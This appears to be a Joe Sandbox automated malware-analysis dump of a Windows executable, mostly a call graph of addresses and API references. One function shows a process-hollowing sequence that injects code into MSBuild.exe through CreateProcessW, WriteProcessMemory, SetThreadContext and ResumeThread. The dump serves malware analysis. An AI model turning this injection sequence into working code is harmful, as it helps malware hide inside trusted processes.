2212f0 20616->20617 20618 22149f 20617->20618 20622 2214c0 20617->20622 20619 22986f __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20618->20619 20621 2214ad 20619->20621 20621->20605 20623 2214df _strlen 20622->20623 20627 221567 20623->20627 20633 22154e 20623->20633 20644 222940 39 API calls 3 library calls 20623->20644 20624 221750 20646 223120 38 API calls std::ios_base::_Init 20624->20646 20627->20633 20640 22b367 20627->20640 20628 221777 20647 223190 30 API calls std::ios_base::_Init 20628->20647 20629 221719 20632 221729 20629->20632 20645 223b30 39 API calls 3 library calls 20629->20645 20636 22986f __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20632->20636 20633->20624 20633->20629 20634 221787 20648 22e6da RaiseException 20634->20648 20638 221746 20636->20638 20637 221792 20638->20618 20641 22b376 20640->20641 20642 22b389 _Yarn 20640->20642 20641->20633 20642->20641 20643 237f3a 69 API calls 20642->20643 20643->20641 20644->20627 20645->20632 20646->20628 20647->20634 20648->20637 20901 229670 40 API calls 20980 222d70 LCMapStringEx __Towlower 20984 240170 42 API calls 3 library calls 20902 229e77 16 API calls 2 library calls 20903 23c275 GetProcessHeap 20985 22ed75 8 API calls 20904 22b27f 45 API calls 2 library calls 20906 22b447 70 API calls 20989 230d49 47 API calls 4 library calls 20909 23124f 7 API calls ___scrt_uninitialize_crt 20910 223050 29 API calls ___std_exception_copy 20911 222e50 21 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 20991 223350 30 API calls 4 library calls 20994 22bb54 16 API calls 20997 23995f 55 API calls 2 library calls 20914 2234a0 5 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 21000 2217a0 75 API calls 3 library calls 20916 2296a1 32 API calls std::ios_base::_Init 20867 2561a9 20868 2561df 20867->20868 20868->20868 20869 25632c GetPEB 20868->20869 20870 25633e CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 20868->20870 20873 2563d5 TerminateProcess 20868->20873 20869->20870 20870->20868 20871 2563e5 WriteProcessMemory 20870->20871 20872 25642a 20871->20872 20874 25646c WriteProcessMemory Wow64SetThreadContext ResumeThread 20872->20874 20875 25642f WriteProcessMemory 20872->20875 20873->20868 20875->20872 21003 2277b0 67 API calls 3 library calls 21005 23b3b7 FreeLibrary 20922 23febe 44 API calls 3 library calls 21006 236b82 7 API calls 20923 224880 69 API calls 3 library calls 20925 23c287 34 API calls 2 library calls 21007 22d984 49 API calls _unexpected 20928 22968b 33 API calls std::ios_base::_Init 20929 22da93 DecodePointer 20931 222c90 GetStringTypeW __Getwctypes 20933 240290 41 API calls 3 library calls 20934 231494 73 API calls 2 library calls 21011 22b598 66 API calls 20936 22b0e0 46 API calls 2 library calls 21012 23f5e1 41 API calls 4 library calls 21014 22c1e1 70 API calls 2 library calls 21015 22b5e6 68 API calls 20938 2314ec GetCommandLineA GetCommandLineW 20192 227af0 20193 227b18 20192->20193 20218 228290 20193->20218 20195 228277 20311 2234f0 30 API calls std::_Throw_Cpp_error 20195->20311 20198 227bf1 20292 2297fb 20198->20292 20199 227c08 20202 2297fb std::ios_base::_Init 3 API calls 20199->20202 20200 22827c 20312 23690c 29 API calls 2 library calls 20200->20312 20205 227bb6 __fread_nolock 20202->20205 20237 228380 20205->20237 20207 228272 20310 225fd0 69 API calls 7 library calls 20207->20310 20208 227d7f 20211 228162 std::ios_base::_Ios_base_dtor 20208->20211 20256 22af05 20208->20256 20265 22aee7 20208->20265 20277 22aef7 20208->20277 20210 227c74 _Yarn 20210->20207 20210->20208 20211->20200 20214 22824c std::ios_base::_Ios_base_dtor 20211->20214 20213 228268 20303 22986f 20214->20303 20313 229b82 20218->20313 20221 229b82 std::_Lockit::_Lockit 7 API calls 20223 2282cf 20221->20223 20224 229bb3 std::_Lockit::~_Lockit 2 API calls 20223->20224 20227 2282f1 20224->20227 20225 22835f 20228 22986f __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20225->20228 20236 228343 20227->20236 20326 228470 66 API calls 5 library calls 20227->20326 20230 227b73 20228->20230 20229 228332 20231 228374 20229->20231 20232 22833a 20229->20232 20230->20195 20230->20198 20230->20199 20230->20205 20328 222b60 RaiseException Concurrency::cancel_current_task 20231->20328 20327 229c26 RaiseException _Yarn Concurrency::cancel_current_task 20232->20327 20319 229bb3 20236->20319 20238 229b82 std::_Lockit::_Lockit 7 API calls 20237->20238 20239 2283a1 20238->20239 20240 229b82 std::_Lockit::_Lockit 7 API calls 20239->20240 20243 2283e1 20239->20243 20241 2283bf 20240->20241 20245 229bb3 std::_Lockit::~_Lockit 2 API calls 20241->20245 20242 229bb3 std::_Lockit::~_Lockit 2 API calls 20246 22844f 20242->20246 20254 228433 20243->20254 20333 228710 66 API calls 4 library calls 20243->20333 20245->20243 20248 22986f __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20246->20248 20247 228422 20249 228464 20247->20249 20250 22842a 20247->20250 20251 22845a 20248->20251 20335 222b60 RaiseException Concurrency::cancel_current_task 20249->20335 20334 229c26 RaiseException _Yarn Concurrency::cancel_current_task 20250->20334 20251->20210 20254->20242 20259 22af28 20256->20259 20261 22af21 20256->20261 20257 22986f __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20258 22b00d 20257->20258 20258->20208 20259->20261 20262 22afce 20259->20262 20263 22af6e 20259->20263 20261->20257 20262->20261 20339 237f3a 20262->20339 20263->20261 20336 22a866 20263->20336 20266 22aeee 20265->20266 20274 22af3a 20265->20274 20559 2313a4 EnterCriticalSection 20266->20559 20268 22af3e 20270 22986f __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20268->20270 20269 22aef3 20269->20208 20272 22b00d 20270->20272 20271 22af6e 20271->20268 20273 22a866 _Fputc 68 API calls 20271->20273 20272->20208 20273->20268 20274->20268 20274->20271 20275 22afce 20274->20275 20275->20268 20276 237f3a 69 API calls 20275->20276 20276->20268 20278 22aed5 20277->20278 20279 22aefe 20278->20279 20281 22aed7 20278->20281 20283 22af52 20278->20283 20560 2313b8 LeaveCriticalSection 20279->20560 20281->20208 20282 22af03 20282->20208 20284 22af54 20283->20284 20285 22afce 20283->20285 20286 22afaf 20283->20286 20284->20208 20287 237f3a 69 API calls 20285->20287 20291 22afc0 20285->20291 20289 22a866 _Fputc 68 API calls 20286->20289 20286->20291 20287->20291 20288 22986f __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20290 22b00d 20288->20290 20289->20291 20290->20208 20291->20288 20293 229800 _Yarn 20292->20293 20294 22981a 20293->20294 20296 22981c 20293->20296 20561 23439c EnterCriticalSection LeaveCriticalSection std::ios_base::_Init 20293->20561 20294->20205 20297 22d2be std::ios_base::_Init 20296->20297 20298 229826 Concurrency::cancel_current_task 20296->20298 20563 22e6da RaiseException 20297->20563 20562 22e6da RaiseException 20298->20562 20301 22d2da 20302 22a3cb 20304 229877 20303->20304 20305 229878 IsProcessorFeaturePresent 20303->20305 20304->20213 20307 22d3cd 20305->20307 20564 22d4b3 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 20307->20564 20309 22d4b0 20309->20213 20310->20195 20314 229b91 20313->20314 20315 229b98 20313->20315 20329 236c22 6 API calls std::_Lockit::_Lockit 20314->20329 20317 2282b1 20315->20317 20330 22da48 EnterCriticalSection 20315->20330 20317->20221 20317->20227 20320 236c30 20319->20320 20321 229bbd 20319->20321 20332 236c0b LeaveCriticalSection 20320->20332 20323 229bd0 20321->20323 20331 22da56 LeaveCriticalSection 20321->20331 20323->20225 20324 236c37 20324->20225 20326->20229 20327->20236 20329->20317 20330->20317 20331->20323 20332->20324 20333->20247 20334->20254 20343 23770f 20336->20343 20338 22a876 20338->20261 20340 237f4d _Fputc 20339->20340 20489 23811b 20340->20489 20342 237f62 _Fputc 20342->20261 20344 237722 _Fputc 20343->20344 20347 237770 20344->20347 20346 237731 _Fputc 20346->20338 20348 23777c ___scrt_is_nonwritable_in_current_image 20347->20348 20349 237785 20348->20349 20350 2377a9 20348->20350 20369 236aa5 29 API calls 2 library calls 20349->20369 20363 2313a4 EnterCriticalSection 20350->20363 20353 2377b2 20355 2377c7 20353->20355 20370 23e079 20353->20370 20356 237833 20355->20356 20357 237864 20355->20357 20377 236aa5 29 API calls 2 library calls 20356->20377 20364 237743 20357->20364 20360 237870 20378 23789c LeaveCriticalSection __fread_nolock 20360->20378 20362 23779e _Fputc 20362->20346 20363->20353 20365 237762 20364->20365 20366 237751 20364->20366 20365->20360 20379 243363 20366->20379 20368 23775d 20368->20360 20369->20362 20371 23e085 20370->20371 20372 23e09a 20370->20372 20487 236211 14 API calls __Wcrtomb 20371->20487 20372->20355 20374 23e08a 20488 2368fc 29 API calls __strnicoll 20374->20488 20376 23e095 20376->20355 20377->20362 20378->20362 20380 2433fe 20379->20380 20381 23e079 __fread_nolock 29 API calls 20380->20381 20384 24340b 20381->20384 20382 243417 20382->20368 20383 243463 20383->20382 20386 2434c5 20383->20386 20404 23d0ab 20383->20404 20384->20382 20384->20383 20403 243379 31 API calls __fread_nolock 20384->20403 20392 2435ee 20386->20392 20390 2434b8 20390->20386 20411 24538f 14 API calls 2 library calls 20390->20411 20393 23e079 __fread_nolock 29 API calls 20392->20393 20394 2435fd 20393->20394 20395 243610 20394->20395 20396 2436a3 20394->20396 20397 24362d 20395->20397 20400 243654 20395->20400 20412 24273c 20396->20412 20399 24273c _Fputc 64 API calls 20397->20399 20401 2434d6 20399->20401 20400->20401 20423 241250 33 API calls _Fputc 20400->20423 20401->20368 20403->20383 20405 23d0b7 _Fputc 20404->20405 20406 23d0e1 20405->20406 20407 23e079 __fread_nolock 29 API calls 20405->20407 20406->20390 20408 23d0d2 20407->20408 20475 246024 20408->20475 20410 23d0d8 20410->20390 20411->20386 20413 242748 ___scrt_is_nonwritable_in_current_image 20412->20413 20414 242789 20413->20414 20416 2427cf 20413->20416 20422 242750 20413->20422 20453 236aa5 29 API calls 2 library calls 20414->20453 20424 242196 EnterCriticalSection 20416->20424 20418 2427d5 20419 2427f3 20418->20419 20425 242520 20418->20425 20454 242845 LeaveCriticalSection __fread_nolock 20419->20454 20422->20401 20423->20401 20424->20418 20426 242548 20425->20426 20450 24256b __fread_nolock 20425->20450 20427 24254c 20426->20427 20429 2425a7 20426->20429 20469 236aa5 29 API calls 2 library calls 20427->20469 20430 2425c5 20429->20430 20470 2412d0 31 API calls __fread_nolock 20429->20470 20455 24284d 20430->20455 20434 242624 20436 24268d WriteFile 20434->20436 20437 242638 20434->20437 20435 2425dd 20438 2425e5 20435->20438 20439 24260c 20435->20439 20442 2426af GetLastError 20436->20442 20452 24261f 20436->20452 20440 242640 20437->20440 20441 242679 20437->20441 20438->20450 20471 242c91 6 API calls _Fputc 20438->20471 20472 2428ca 45 API calls 4 library calls 20439->20472 20444 242665 20440->20444 20445 242645 20440->20445 20462 242cf9 20441->20462 20442->20452 20474 242ebd 8 API calls 2 library calls 20444->20474 20448 24264e 20445->20448 20445->20450 20473 242dd4 7 API calls 2 library calls 20448->20473 20450->20419 20452->20450 20453->20422 20454->20422 20456 246024 __fread_nolock 29 API calls 20455->20456 20458 24285f 20456->20458 20457 2425d7 20457->20434 20457->20435 20458->20457 20459 24288d 20458->20459 20460 231840 _Fputc 39 API calls 20458->20460 20459->20457 20461 2428a7 GetConsoleMode 20459->20461 20460->20459 20461->20457 20467 242d08 _Fputc 20462->20467 20463 242db9 20464 22986f __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20463->20464 20465 242dd2 20464->20465 20465->20450 20466 242d78 WriteFile 20466->20467 20468 242dbb GetLastError 20466->20468 20467->20463 20467->20466 20468->20463 20469->20450 20470->20430 20471->20450 20472->20452 20473->20450 20474->20452 20476 246031 20475->20476 20477 24603e 20475->20477 20484 236211 14 API calls __Wcrtomb 20476->20484 20480 24604a 20477->20480 20485 236211 14 API calls __Wcrtomb 20477->20485 20479 246036 20479->20410 20480->20410 20482 24606b 20486 2368fc 29 API calls __strnicoll 20482->20486 20484->20479 20485->20482 20486->20479 20487->20374 20488->20376 20490 238151 20489->20490 20491 238129 20489->20491 20490->20342 20491->20490 20492 238136 20491->20492 20493 238158 20491->20493 20505 236aa5 29 API calls 2 library calls 20492->20505 20497 2381de 20493->20497 20498 2381ea ___scrt_is_nonwritable_in_current_image 20497->20498 20506 2313a4 EnterCriticalSection 20498->20506 20500 2381f8 20507 238192 20500->20507 20504 238190 20504->20342 20505->20490 20506->20500 20515 23d000 20507->20515 20514 23822d LeaveCriticalSection __fread_nolock 20514->20504 20516 23d0ab _Fputc 29 API calls 20515->20516 20517 23d011 _Fputc 20516->20517 20518 2381aa 20517->20518 20536 23a8d1 20517->20536 20522 237f74 20518->20522 20525 237f86 20522->20525 20526 237faf 20522->20526 20523 237f94 20552 236aa5 29 API calls 2 library calls 20523->20552 20525->20523 20525->20526 20531 237fca _Yarn 20525->20531 20532 23d0e9 20526->20532 20527 243363 _Fputc 66 API calls 20527->20531 20529 23e079 __fread_nolock 29 API calls 20529->20531 20530 24273c _Fputc 64 API calls 20530->20531 20531->20526 20531->20527 20531->20529 20531->20530 20553 2370cb 20531->20553 20533 2381d4 20532->20533 20534 23d0f4 20532->20534 20533->20514 20534->20533 20535 2370cb ___scrt_uninitialize_crt 64 API calls 20534->20535 20535->20533 20537 23a90f 20536->20537 20541 23a8df _unexpected 20536->20541 20550 236211 14 API calls __Wcrtomb 20537->20550 20538 23a8fa RtlAllocateHeap 20540 23a90d 20538->20540 20538->20541 20543 23a897 20540->20543 20541->20537 20541->20538 20549 23439c EnterCriticalSection LeaveCriticalSection std::ios_base::_Init 20541->20549 20544 23a8a2 HeapFree 20543->20544 20545 23a8cc 20543->20545 20544->20545 20546 23a8b7 GetLastError 20544->20546 20545->20518 20547 23a8c4 __dosmaperr 20546->20547 20551 236211 14 API calls __Wcrtomb 20547->20551 20549->20541 20550->20540 20551->20545 20552->20526 20554 2370e4 20553->20554 20558 23710b 20553->20558 20555 23e079 __fread_nolock 29 API calls 20554->20555 20554->20558 20556 237100 20555->20556 20557 24273c _Fputc 64 API calls 20556->20557 20557->20558 20558->20531 20559->20269 20560->20282 20561->20293 20562->20302 20563->20301 20564->20309 20649 22e3f0 20650 22e3fc ___scrt_is_nonwritable_in_current_image 20649->20650 20675 229a58 20650->20675 20652 22e403 20653 22e55c 20652->20653 20663 22e42d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 20652->20663 20724 22d86f 4 API calls 2 library calls 20653->20724 20655 22e563 20725 23406a 21 API calls CallUnexpected 20655->20725 20657 22e569 20726 234080 21 API calls CallUnexpected 20657->20726 20659 22e571 20660 22e44c 20661 22e4cd 20686 2365e9 59 API calls 20661->20686 20663->20660 20663->20661 20720 2340b4 39 API calls 4 library calls 20663->20720 20665 22e4d3 20687 2220d0 GetModuleHandleW GetModuleFileNameA 20665->20687 20669 22e4f4 20669->20655 20670 22e4f8 20669->20670 20671 22e501 20670->20671 20722 234096 21 API calls CallUnexpected 20670->20722 20723 229a91 75 API calls ___scrt_uninitialize_crt 20671->20723 20674 22e50a 20674->20660 20676 229a61 20675->20676 20727 22d4db IsProcessorFeaturePresent 20676->20727 20678 229a6d 20728 22ed89 10 API calls 2 library calls 20678->20728 20680 229a72 20685 229a76 20680->20685 20729 2312bf 20680->20729 20683 229a8d 20683->20652 20685->20652 20686->20665 20688 2297fb std::ios_base::_Init 3 API calls 20687->20688 20689 222106 20688->20689 20690 2297fb std::ios_base::_Init 3 API calls 20689->20690 20691 222112 20690->20691 20742 233e7d 20691->20742 20693 222133 20694 2221fc 20693->20694 20695 2221e7 20693->20695 20696 22214a GetCurrentThreadId 20693->20696 20762 22a1d4 30 API calls 2 library calls 20694->20762 20759 22a1d4 30 API calls 2 library calls 20695->20759 20698 222157 20696->20698 20699 2221ee 20696->20699 20757 22d0b6 WaitForSingleObjectEx GetExitCodeThread CloseHandle 20698->20757 20760 22a1d4 30 API calls 2 library calls 20699->20760 20701 222209 20763 22a1d4 30 API calls 2 library calls 20701->20763 20705 2221f5 20761 22a1d4 30 API calls 2 library calls 20705->20761 20708 222163 20708->20705 20709 2297fb std::ios_base::_Init 3 API calls 20708->20709 20710 22217e 20709->20710 20711 233e7d 49 API calls 20710->20711 20712 22219d 20711->20712 20712->20695 20712->20701 20713 2221af GetCurrentThreadId 20712->20713 20713->20699 20714 2221b8 20713->20714 20758 22d0b6 WaitForSingleObjectEx GetExitCodeThread CloseHandle 20714->20758 20716 2221c7 20716->20705 20717 2221ce 20716->20717 20718 22986f __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20717->20718 20719 2221dc 20718->20719 20721 22d81c GetModuleHandleW 20719->20721 20720->20661 20721->20669 20722->20671 20723->20674 20724->20655 20725->20657 20726->20659 20727->20678 20728->20680 20733 23cc5e 20729->20733 20732 22eda8 7 API calls 2 library calls 20732->20685 20734 23cc6e 20733->20734 20735 229a7f 20733->20735 20734->20735 20737 23c3d2 20734->20737 20735->20683 20735->20732 20738 23c3d9 20737->20738 20739 23c41c GetStdHandle 20738->20739 20740 23c47e 20738->20740 20741 23c42f GetFileType 20738->20741 20739->20738 20740->20734 20741->20738 20743 233e8a 20742->20743 20744 233e9e 20742->20744 20773 236211 14 API calls __Wcrtomb 20743->20773 20764 233f0e 20744->20764 20747 233e8f 20774 2368fc 29 API calls __strnicoll 20747->20774 20750 233eb3 CreateThread 20752 233ed2 GetLastError 20750->20752 20755 233ede 20750->20755 20795 233f95 20750->20795 20751 233e9a 20751->20693 20775 236237 14 API calls 2 library calls 20752->20775 20776 233f5e 20755->20776 20757->20708 20758->20716 20784 23bc50 20764->20784 20767 23a897 ___free_lconv_mon 14 API calls 20768 233f2c 20767->20768 20769 233f33 GetModuleHandleExW 20768->20769 20770 233f50 20768->20770 20769->20770 20771 233f5e 16 API calls 20770->20771 20772 233eaa 20771->20772 20772->20750 20772->20755 20773->20747 20774->20751 20775->20755 20777 233f6a 20776->20777 20783 233ee9 20776->20783 20778 233f70 CloseHandle 20777->20778 20779 233f79 20777->20779 20778->20779 20780 233f88 20779->20780 20781 233f7f FreeLibrary 20779->20781 20782 23a897 ___free_lconv_mon 14 API calls 20780->20782 20781->20780 20782->20783 20783->20693 20785 23bc5d 20784->20785 20786 23bc9d 20785->20786 20787 23bc88 HeapAlloc 20785->20787 20792 23bc71 _unexpected 20785->20792 20794 236211 14 API calls __Wcrtomb 20786->20794 20788 23bc9b 20787->20788 20787->20792 20790 233f1f 20788->20790 20790->20767 20792->20786 20792->20787 20793 23439c EnterCriticalSection LeaveCriticalSection std::ios_base::_Init 20792->20793 20793->20792 20794->20790 20796 233fa1 ___scrt_is_nonwritable_in_current_image 20795->20796 20797 233fb5 20796->20797 20798 233fa8 GetLastError ExitThread 20796->20798 20809 23ab23 GetLastError 20797->20809 20803 233fd1 20841 233f00 17 API calls 20803->20841 20810 23ab3f 20809->20810 20811 23ab39 20809->20811 20815 23ab43 SetLastError 20810->20815 20843 23b57a 6 API calls std::_Lockit::_Lockit 20810->20843 20842 23b53b 6 API calls std::_Lockit::_Lockit 20811->20842 20814 23ab5b 20814->20815 20817 23bc50 _unexpected 14 API calls 20814->20817 20819 233fba 20815->20819 20820 23abd8 20815->20820 20818 23ab70 20817->20818 20822 23ab89 20818->20822 20823 23ab78 20818->20823 20836 23e0dc 20819->20836 20848 236e66 39 API calls CallUnexpected 20820->20848 20845 23b57a 6 API calls std::_Lockit::_Lockit 20822->20845 20844 23b57a 6 API calls std::_Lockit::_Lockit 20823->20844 20827 23ab95 20829 23abb0 20827->20829 20830 23ab99 20827->20830 20828 23ab86 20832 23a897 ___free_lconv_mon 14 API calls 20828->20832 20847 23ae34 14 API calls _unexpected 20829->20847 20846 23b57a 6 API calls std::_Lockit::_Lockit 20830->20846 20832->20815 20834 23abbb 20835 23a897 ___free_lconv_mon 14 API calls 20834->20835 20835->20815 20837 233fc5 20836->20837 20838 23e0ec CallUnexpected 20836->20838 20837->20803 20840 23b787 5 API calls std::_Lockit::_Lockit 20837->20840 20838->20837 20849 23b830 20838->20849 20840->20803 20842->20810 20843->20814 20844->20828 20845->20827 20846->20828 20847->20834 20852 23b97d 20849->20852 20853 23b9ad 20852->20853 20857 23b84c 20852->20857 20853->20857 20859 23b8b2 20853->20859 20856 23b9c7 GetProcAddress 20856->20857 20858 23b9d7 std::_Lockit::_Lockit 20856->20858 20857->20837 20858->20857 20865 23b8c3 ___vcrt_FlsGetValue 20859->20865 20860 23b959 20860->20856 20860->20857 20861 23b8e1 LoadLibraryExW 20862 23b960 20861->20862 20863 23b8fc GetLastError 20861->20863 20862->20860 20864 23b972 FreeLibrary 20862->20864 20863->20865 20864->20860 20865->20860 20865->20861 20866 23b92f LoadLibraryExW 20865->20866 20866->20862 20866->20865 20941 23c2f0 15 API calls 21020 22b7f5 72 API calls std::ios_base::_Ios_base_dtor 21021 22c3f8 56 API calls 2 library calls 21022 229bff DeleteCriticalSection 21026 223dc0 72 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 21028 229fc4 9 API calls 3 library calls 20945 2296cf 47 API calls 2 library calls 21032 2313cc 15 API calls 2 library calls 20947 226cd0 99 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 21035 2285d0 48 API calls 21040 22e3de 30 API calls 20950 23aadd 16 API calls __Wcrtomb

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,0025611B,0025610B), ref: 0025633F
                                                                                                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00256352
                                                                                                                                                                                                                                              • Wow64GetThreadContext.KERNEL32(00000094,00000000), ref: 00256370
                                                                                                                                                                                                                                              • ReadProcessMemory.KERNELBASE(00000098,?,0025615F,00000004,00000000), ref: 00256394
                                                                                                                                                                                                                                              • VirtualAllocEx.KERNELBASE(00000098,?,?,00003000,00000040), ref: 002563BF
                                                                                                                                                                                                                                              • TerminateProcess.KERNELBASE(00000098,00000000), ref: 002563DE
                                                                                                                                                                                                                                              • WriteProcessMemory.KERNELBASE(00000098,00000000,?,?,00000000,?), ref: 00256417
                                                                                                                                                                                                                                              • WriteProcessMemory.KERNELBASE(00000098,00400000,?,?,00000000,?,00000028), ref: 00256462
                                                                                                                                                                                                                                              • WriteProcessMemory.KERNELBASE(00000098,?,?,00000004,00000000), ref: 002564A0
                                                                                                                                                                                                                                              • Wow64SetThreadContext.KERNEL32(00000094,01610000), ref: 002564DC
                                                                                                                                                                                                                                              • ResumeThread.KERNELBASE(00000094), ref: 002564EB
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
                                                                                                                                                                                                                                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                                                                                                                                                              • API String ID: 2440066154-3857624555
                                                                                                                                                                                                                                              • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                                                                                                                                              • Instruction ID: a825fa68b0c0304b18166c38a0a90e3a073672f07fc27f352b98e56281c358ca
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 32B1077260068AAFDB60CF68CC80BDA77A5FF88714F158164EA0CAB341D770FA55CB94

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 63 221b70-221bd6 GetPEB call 221000 CreateFileA 66 221ea9-221ebd call 22986f 63->66 67 221bdc-221bea GetFileSize 63->67 69 221e82-221e89 CloseHandle 67->69 70 221bf0-221c0f call 229861 ReadFile 67->70 69->66 74 221c15-221c2a CloseHandle 70->74 75 221e79-221e7f call 22986a 70->75 76 221c30-221c4f 74->76 77 221e8b-221e93 74->77 75->69 79 221c6e-221c8e call 238870 76->79 81 221e9a-221ea1 call 221ab0 77->81 86 221c94-221c9d 79->86 87 221ebe call 2234f0 79->87 85 221ea6 81->85 85->66 89 221cc0-221cd5 86->89 90 221c9f-221cbb call 230360 86->90 91 221ec3-221ed7 call 23690c 87->91 93 221cf0-221cfc call 2297fb 89->93 94 221cd7-221cec call 2297fb 89->94 100 221d1e-221d44 90->100 106 221ee6-221ee8 91->106 107 221ed9-221edc 91->107 103 221cfe-221d1a call 230360 93->103 94->103 104 221d4a-221d58 100->104 105 221dc8-221dd5 100->105 103->100 109 221da0-221daa 104->109 110 221d5a-221d5f 104->110 113 221df3-221dff 105->113 114 221dd7-221dda 105->114 111 221eeb DefWindowProcW 107->111 112 221ede-221ee0 PostQuitMessage 107->112 109->105 117 221dac-221dc6 109->117 116 221d60-221d9e 110->116 112->106 120 221e01-221e10 113->120 118 221de9-221df1 114->118 119 221ddc-221ddf 114->119 116->109 116->116 117->105 118->113 119->120 123 221de1-221de6 119->123 121 221e12-221e1b 120->121 122 221e41-221e5f 120->122 124 221e37-221e3e call 229830 121->124 125 221e1d-221e28 121->125 126 221c60-221c68 122->126 127 221e65-221e74 122->127 123->118 124->122 125->91 128 221e2e-221e35 125->128 126->79 126->81 127->126 128->124
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00221000: _strlen.LIBCMT ref: 00221067
                                                                                                                                                                                                                                              • CreateFileA.KERNELBASE ref: 00221BD1
                                                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00221BE1
                                                                                                                                                                                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 00221C07
                                                                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 00221C16
                                                                                                                                                                                                                                              • _strlen.LIBCMT ref: 00221C84
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00221E83
                                                                                                                                                                                                                                              • PostQuitMessage.USER32(00000000), ref: 00221EE0
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
